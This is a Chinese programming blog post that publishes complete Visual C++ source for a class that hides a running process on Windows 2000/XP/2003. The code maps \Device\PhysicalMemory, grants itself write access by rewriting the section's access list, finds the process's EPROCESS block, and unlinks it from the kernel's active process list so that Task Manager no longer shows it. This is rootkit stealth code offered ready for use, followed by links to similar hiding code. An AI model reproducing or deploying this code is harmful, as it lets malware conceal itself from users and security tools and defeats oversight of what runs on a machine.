vc 隐藏进程

最新推荐文章于 2021-11-25 15:43:24 发布
最新推荐文章于 2021-11-25 15:43:24 发布
阅读量6.8k 收藏 6
点赞数 2
分类专栏: VC++ 
#ifndef HIDEPROCESS_H
#define HIDEPROCESS_H
class CHideProcess 
{
public:
	// 接口:隐藏当前进程
	static BOOL HideCurrent();

	// 接口:隐藏当前进程
	static BOOL HideByID(DWORD dwID);

	// 析构
	virtual ~CHideProcess();
protected:
	static BOOL        InitNTDLL();
	static BOOL        YHideProcess(DWORD dwID);
	static VOID        CloseNTDLL();
	static VOID        SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
	static HANDLE    OpenPhysicalMemory();
	static PVOID    LinearToPhys(PULONG BaseAddress, PVOID addr);
	static ULONG    GetData(PVOID addr);
	static BOOL        SetData(PVOID addr,ULONG data);
	static DWORD    GetEprocessFromPid (ULONG PID);
	// long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);

protected:
	static BOOL m_bInit;
	static CHideProcess m_NoAction;

private:
	// 构造析构
	CHideProcess();
};
#endif


// HideProcess.cpp: implementation of the CHideProcess class.
//进程隐藏程序
// 要隐藏时调用HideProcess即可
//
#include "stdafx.h"
#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>
#include "HideProcess.h"

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK 
{
   NTSTATUS Status;
   ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING 
{
   USHORT Length;
   USHORT MaximumLength;
   PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT               0x00000002L
#define OBJ_PERMANENT               0x00000010L
#define OBJ_EXCLUSIVE               0x00000020L
#define OBJ_CASE_INSENSITIVE       0x00000040L
#define OBJ_OPENIF                   0x00000080L
#define OBJ_OPENLINK               0x00000100L
#define OBJ_KERNEL_HANDLE           0x00000200L
#define OBJ_VALID_ATTRIBUTES       0x000003F2L

typedef struct _OBJECT_ATTRIBUTES 
{
   ULONG Length;
   HANDLE RootDirectory;
   PUNICODE_STRING ObjectName;
   ULONG Attributes;
   PVOID SecurityDescriptor;
   PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 

//
// SYSTEM_INFORMATION_CLASS
//
typedef enum _SYSTEM_INFORMATION_CLASS
{
   SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

//
// SYSTEM_HANDLE_INFORMATION
// Information Class 16
//
typedef struct _SYSTEM_HANDLE_INFORMATION
{
   ULONG                ProcessId;
   UCHAR                ObjectTypeNumber;
   UCHAR                Flags;
   USHORT                Handle;
   PVOID                Object;
   ACCESS_MASK            GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;


typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
                                          OUT PHANDLE SectionHandle,
                                          IN ACCESS_MASK DesiredAccess,
                                          IN POBJECT_ATTRIBUTES ObjectAttributes
                                          );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
                                            IN OUT PUNICODE_STRING DestinationString,
                                            IN PCWSTR SourceString
                                            );

typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) ( 
                               IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 
                               IN OUT PVOID SystemInformation, 
                               IN ULONG SystemInformationLength, 
                               OUT PULONG ReturnLength OPTIONAL 
                               );


RTLINITUNICODESTRING        RtlInitUnicodeString     = NULL;
ZWOPENSECTION                ZwOpenSection             = NULL;
ZWQUERYSYSTEMINFORMATION    ZwQuerySystemInformation = NULL;
HMODULE     g_hNtDLL = NULL;
PVOID         g_pMapPhysicalMemory = NULL;
HANDLE         g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------

BOOL CHideProcess::m_bInit = FALSE;
CHideProcess CHideProcess::m_NoAction;
//
// Construction/Destruction
//

CHideProcess::CHideProcess()
{
   m_bInit = InitNTDLL();
}

CHideProcess::~CHideProcess()
{
   CloseNTDLL();
}

// load dll and get functions 
BOOL CHideProcess::InitNTDLL()
{
   // load dll
   if (NULL == g_hNtDLL)
   {
       g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
       if (NULL == g_hNtDLL)
       {
           return FALSE;
       }
   }
   
   // get functions
   RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
   ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
   ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
   if ((RtlInitUnicodeString == NULL)
       || (ZwOpenSection == NULL)
       || (ZwQuerySystemInformation == NULL))
   {
       return FALSE;
   }

   m_bInit = TRUE;
   return TRUE;
}
//---------------------------------------------------------------------------
VOID CHideProcess::CloseNTDLL()
{
   if (NULL != g_hNtDLL)
   {
       FreeLibrary(g_hNtDLL);
       g_hNtDLL = NULL;
       m_bInit = FALSE;
   }
}
//---------------------------------------------------------------------------
VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 
{ 
   PACL pDacl                    = NULL; 
   PSECURITY_DESCRIPTOR pSD    = NULL; 
   PACL pNewDacl = NULL; 
   
   DWORD dwRes = GetSecurityInfo(
                                   hSection, 
                                   SE_KERNEL_OBJECT, 
                                   DACL_SECURITY_INFORMATION, 
                                   NULL, 
                                   NULL, 
                                   &pDacl, 
                                   NULL, 
                                   &pSD
                                   );
   
   if(ERROR_SUCCESS != dwRes)
   {
       
       if(pSD) 
           LocalFree(pSD); 
       if(pNewDacl) 
           LocalFree(pNewDacl); 
   }
   
   EXPLICIT_ACCESS ea; 
   RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); 
   ea.grfAccessPermissions = SECTION_MAP_WRITE; 
   ea.grfAccessMode = GRANT_ACCESS; 
   ea.grfInheritance= NO_INHERITANCE; 
   ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
   ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
   ea.Trustee.ptstrName = _T("CURRENT_USER"); 
   
   dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
   
   if(ERROR_SUCCESS != dwRes)
   {
       
       if(pSD) 
           LocalFree(pSD); 
       if(pNewDacl) 
           LocalFree(pNewDacl); 
   }
   dwRes = SetSecurityInfo(
                           hSection, 
                           SE_KERNEL_OBJECT, 
                           DACL_SECURITY_INFORMATION,
                           NULL,
                           NULL,
                           pNewDacl,
                           NULL
                           );
   
   if(ERROR_SUCCESS != dwRes)
   {        
       if(pSD) 
           LocalFree(pSD); 
       if(pNewDacl) 
           LocalFree(pNewDacl); 
   }
   
} 
//---------------------------------------------------------------------------
HANDLE CHideProcess::OpenPhysicalMemory()
{
   NTSTATUS status;
   UNICODE_STRING physmemString;
   OBJECT_ATTRIBUTES attributes;
   ULONG PhyDirectory;
   
   g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   GetVersionEx (&g_osvi);
   
   if (5 != g_osvi.dwMajorVersion)
       return NULL;
   
   switch(g_osvi.dwMinorVersion)
   {
   case 0:
       PhyDirectory = 0x30000;
       break; // 2k
   case 1:
       PhyDirectory = 0x39000;
       break; // xp
   case 2:
       PhyDirectory = 0x39000;
       break; // 2k03
   default:
       AfxMessageBox(_T("init PhysicalMemory: Unknown version..."));
       TRACE(_T("init PhysicalMemory: Unknown version...\n"));
       return NULL;
   }
   
   RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
   
   attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);
   attributes.RootDirectory            = NULL;
   attributes.ObjectName                = &physmemString;
   attributes.Attributes                = 0;
   attributes.SecurityDescriptor        = NULL;
   attributes.SecurityQualityOfService    = NULL;
   
   status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 
   
   if(status == STATUS_ACCESS_DENIED)
   { 
       status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); 
       SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
       CloseHandle(g_hMPM);
       status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 
   }
   
   if(!NT_SUCCESS(status)) 
   {
       AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed..."));
       TRACE(_T("Open section: \\Device\\PhysicalMemory failed...\n"));
       return NULL;
   }
   
   TRACE(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory);
   g_pMapPhysicalMemory = MapViewOfFile(    // ZwMapViewOfSection
                                       g_hMPM,        // handle
                                       FILE_MAP_READ|FILE_MAP_WRITE, 
                                       0,                // offset high part 
                                       PhyDirectory,    // offset low part        
                                       0x1000            // size
                                       );
   
   if( g_pMapPhysicalMemory == NULL )
   {
       AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
       TRACE(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
       return NULL;
   }
   
   return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
   ULONG VAddr = (ULONG)addr;
   ULONG PGDE = BaseAddress[VAddr>>22];
   ULONG PTE;
   ULONG PAddr;
   
   if (0 == (PGDE & 1))
       return 0;
   
   ULONG tmp = PGDE & 0x00000080;
   
   if (0 != tmp)
   {
       PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
   }
   else
   {
       TRACE(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000);
       PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
       PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
       
       if (0 == (PTE&1))
           return 0;
       
       PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
       UnmapViewOfFile((PVOID)PGDE);
   }
   
   return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG CHideProcess::GetData(PVOID addr)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   TRACE(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"), 
       g_pMapPhysicalMemory, addr, phys);
   TRACE(_T("GetData() OffSet: %p\n"), phys & 0xfffff000);
   PULONG tmp = (PULONG)MapViewOfFile(
                                   g_hMPM, 
                                   FILE_MAP_READ|FILE_MAP_WRITE, 
                                   0, 
                                   phys & 0xfffff000,    // offset low part
                                   0x1000                // size
                                   );
   
   if (0 == tmp)
       return 0;
   
   ULONG ret = tmp[(phys & 0xFFF)>>2];
   UnmapViewOfFile(tmp);
   
   return ret;
}
//---------------------------------------------------------------------------
BOOL CHideProcess::SetData(PVOID addr,ULONG data)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   TRACE(_T("SetData() OffSet: %p\n"), phys & 0xfffff000);
   PULONG tmp = (PULONG)MapViewOfFile(
                                       g_hMPM, 
                                       FILE_MAP_WRITE, 
                                       0, 
                                       phys & 0xfffff000, 
                                       0x1000
                                       );
   
   if (0 == tmp)
       return FALSE;
   
   tmp[(phys & 0xFFF)>>2] = data;
   UnmapViewOfFile(tmp);
   
   return TRUE;
}
//---------------------------------------------------------------------------
/*
long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp)
{
   ExitProcess(0);
   return 1 ;
}
//*/
//---------------------------------------------------------------------------
DWORD CHideProcess::GetEprocessFromPid (ULONG PID)
{
   NTSTATUS                    status;
   PVOID                        buf   = NULL;
   ULONG                        size = 1;
   ULONG                        NumOfHandle = 0;
   ULONG                        i;
   PSYSTEM_HANDLE_INFORMATION    h_info = NULL;
   DWORD dwCurrentID = GetCurrentProcessId();
   // TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID);
   
   // LocateNtdllEntry( );
   //打开自身句柄,这样才能在 handle 列表中找到自己, PROCESS 对应 ObjectTypeNum 为5
   HANDLE hProc = OpenProcess( 
                               // PROCESS_ALL_ACCESS,
                               PROCESS_QUERY_INFORMATION,
                               FALSE,
                               PID // GetCurrentProcessId() // 
                               );
   if (NULL == hProc)
   {
       TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
       TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
       return 0;
   }

   for ( size = 1024; ; size *= 2 )
   {
       if ( NULL == ( buf = calloc( size, 1 ) ) )
       {
           TRACE( _T("calloc( %u, 1 ) failed\n"), size );
           TRACE(_T("calloc( %u, 1 ) failed\n"), size );
           if ( buf != NULL )
           {
               free( buf );
               buf = NULL;
           }
           CloseHandle(hProc);
           return 0;
       }
       status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL );
       if ( !NT_SUCCESS( status ) )
       {
           if ( STATUS_INFO_LENGTH_MISMATCH == status )
           {
               free( buf );
               buf = NULL;
               continue;
           }
           else
           {
               TRACE( "ZwQuerySystemInformation() failed\n");
               TRACE( "ZwQuerySystemInformation() failed\n");
               if ( buf != NULL )
               {
                   free( buf );
                   buf = NULL;
               }
               CloseHandle(hProc);
               return 0;
           }
       }
       else
       {
           break;
       }
   } /* end of for */
   
   //返回到缓冲区的首先是一个ULONG类型的数据,表示有多少数组
   NumOfHandle = *((PULONG)buf);
   
   h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4);

   for(i = 0; i < NumOfHandle; i++)
   {
       if(h_info->ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) )
       {
           // TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"), 
           //    PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber);
           if (h_info->Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5)
           {
               // TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"), 
               //    PID, hProc, h_info.Object);
               DWORD dwRet = (DWORD)(h_info->Object);
               if (buf != NULL)
               {
                   free( buf );
                   buf = NULL;
               }
               CloseHandle(hProc);
               return dwRet;
           }
       }
   }

   if ( buf != NULL )
   {
       free( buf );
       buf = NULL;
   }
   CloseHandle(hProc);
   return 0;
}

// 隐藏进程主函数
BOOL CHideProcess::YHideProcess(DWORD dwID)
{
   // 
   if (!m_bInit)
   {
       AfxMessageBox(_T("load NTDLL failed..."));
       TRACE(_T("load NTDLL failed...\n"));
       return FALSE;
   }

   // 获得指向进程的 EPROCESS 数据块的指针
   ULONG process = (ULONG)GetEprocessFromPid(dwID);
   if (process == 0)
   {
       // 
       TRACE(_T("GetEprocessFromPid() failed...\n"));
       return FALSE;
   }
   TRACE(_T("GetEprocessFromPid() process = %p...\n"), process);
   
   // 这个是打开对应的系统内存,并且映射为一个核心对象
   if (NULL == OpenPhysicalMemory())
   {
       AfxMessageBox(_T("OpenPhysicalMemory() failed..."));
       TRACE(_T("OpenPhysicalMemory() failed...\n"));
       return FALSE;
   }
   // 
   // 下面的两个 if 完成对 Windows 的系统版本判断(只判断了2K和XP),
   // 并且根据不同的系统确定 EPROCESS 块中两个指针 FLINK 和 BLINK 的偏移位置
   ULONG fw, bw;
   if (0 == g_osvi.dwMinorVersion)
   {
       // in Win2000/Vista:
       fw = GetData(PVOID(process + 0xa0));
       bw = GetData(PVOID(process + 0xa4));        
   }
   else if ((1 == g_osvi.dwMinorVersion)
       || (2 == g_osvi.dwMinorVersion))
   {
       // in WinXP: in Win2003
       fw = GetData(PVOID(process + 0x88));
       bw = GetData(PVOID(process + 0x8c));        
   }

   // ****
   TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
   TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);

   // 下面的两个SetData完成对进程活动链的更改,
   // 也就是让进程活动链跳过当前进程的EPROCESS块
   SetData(PVOID(fw + 4), bw);
   SetData(PVOID(bw), fw);
   
   // 完成了
   UnmapViewOfFile(g_pMapPhysicalMemory);
   g_pMapPhysicalMemory = NULL;
   CloseHandle(g_hMPM);
   g_hMPM = NULL;
   
   return TRUE;
}

// 隐藏进程接口
BOOL CHideProcess::HideCurrent()
{
   TRACE(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId());
   return YHideProcess(GetCurrentProcessId());
}

// 隐藏进程接口
BOOL CHideProcess::HideByID(DWORD dwID)
{
   TRACE(_T("Hide Process ID = %d \n"), dwID);
   return YHideProcess(dwID);
}


yunshouhu
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
c++ 隐藏进程_记一次隐藏进程的驱动模块编写
weixin_35673021的博客
01-07 1525
点击蓝字关注我们# 前言在家闲着无聊写了一个隐藏文件隐藏进程的驱动模块就是大家俗称的rootkit技术#Rootkit介绍Rootkit 是一种特殊类型的 malware(恶意软件),Rootkit 之所以特殊是因为您不知道它们在做什么事情。Rootkit 基本上是无法检测到的,而且几乎不能删除它们。虽然检测工具在不断增多,但是恶意软件的开发者也在不断寻找新的途径来掩盖他们的踪迹。R...
隐藏进程(在任务管理器中看不到),vc6.0
驱动开发
03-07 3163
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////Hide Process#include#include#include#defin
ring3 下隐藏进程
04-10
Ring3 下隐藏进程.txt
vc隐藏进程
11-27
VC实现一个隐藏自身进程的程序,分享一下
win10下c/c++隐藏进程
Cosmopolitan的博客
06-16 8907
原理:通过将进程注册为系统服务来隐藏进程 环境:Win10(不需要管理员权限) typedef DWORD(*LPREGISTERSERVICEPROCESS)(DWORD, DWORD); //UpdateData(TRUE); HINSTANCE hDLL; LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; ...
隐藏任意进程,目录/文件,注册表,端口
03-03 1299
Author: sinisterEmail: sinister@whitecell.orgHomepage:http://www.whitecell.org Date: 2002-05-08查找进程,目录/文件,注册表等操作系统将最终调用 ZwQueryDirectoryFile,ZwQuerySystemInformation,ZwXXXValueKey 等函数。要想拦截这些函数达到隐藏目的,需
修改活动进程隐藏进程
Puzzle的专栏
06-25 1653
如何修改活动进程链来隐藏进程?通过PsGetCurrentProcess函数可以获取当前线程的EPROCESS,反汇编这个函数的话可以看到这个内核函数只有三行: mov eax, fs:0x00000124; mov eax, [eax + 0x44]; ret Windows中有一个叫Kernel's Processor Control Block (KPRCB),核心处理控制块的结
C++实现进程隐藏
04-22
VC++实现进程隐藏,在WINDOWS平台下的隐藏
在2000和xp下,隐藏进程,vc6.0测试通过
yanzheng1的专栏
01-14 1272
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////Hide Process#include#include#include#defin
C++任务管理器 进程隐藏
qq609438173的博客
11-25 1374
哪位大哥会C++隐藏进程程序的联系我
HideProcess完结篇.zip_c++ 进程隐藏_c++隐藏进程_隐藏进程_隐藏驱动_驱动隐藏进程
07-15
C++隐藏进程C++语言编写驱动级隐藏
Linux隐藏进程
无与伦比BLOG
03-09 5522
系统信息:内核为2.6.32, CentOSX86_64 由于不能修改内核源码,故需要引入劫持系统调用技术、Linux可卸载模块编程技术 示例程序 #include #include #include #include #include #include #include #include #include #define CALLOFF 100 //define
进程隐藏VC++实现
01-30
里面是使用visual studio 2008 C++编写的, 使用修改内存中的进程活动链来实现的隐藏。 可以在XP SP3(不含SP3)之前的版本实现成功。
C++测试源码_驱动源码_驱动模式隐藏保护进程
08-14
C++源码_驱动模式隐藏保护进程 驱动模式 隐藏 保护 进程 win7 ,xp 能用 测试过...
隐藏程序不被进程关闭,可设置时间,VC++实现
03-17
内容索引:VC/C++源码,系统相关,进程  VC++实现隐藏程序,并保证不被进程关闭,可设置隐藏的时间。程序实现的基本思路是:加载RegisterServiceProcess函数所在的链接库,得到RegisterServiceProcess函数的地址,执行RegisterServiceProcess函数,在任务列表中隐藏程序卸载链接库,设定定时器,隐藏程序的同时,隐藏窗口。
VC实现隐藏进程 纯SDK实现
06-12
VC实现隐藏进程 纯SDK实现 很经典的一个小程序 值得学习
两个基于VC的显示和隐藏进程的程序(可用)
03-16
两个从网上找到的基于VC平台的现实和隐藏进程的程序。
VC隐藏进程资料.
11-19
### VC隐藏进程技术详解 #### 一、概述 在计算机安全领域中,隐藏进程是一种常见的技术手段,被用于实现特定程序或服务的隐蔽运行。本文将深入探讨如何使用Visual C++VC)来实现进程隐藏功能。通过分析提供的...
隐藏进程.zip_Vc_进程_隐藏_隐藏 进程_隐藏进程
07-15
vc编写的进程隐藏代码
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值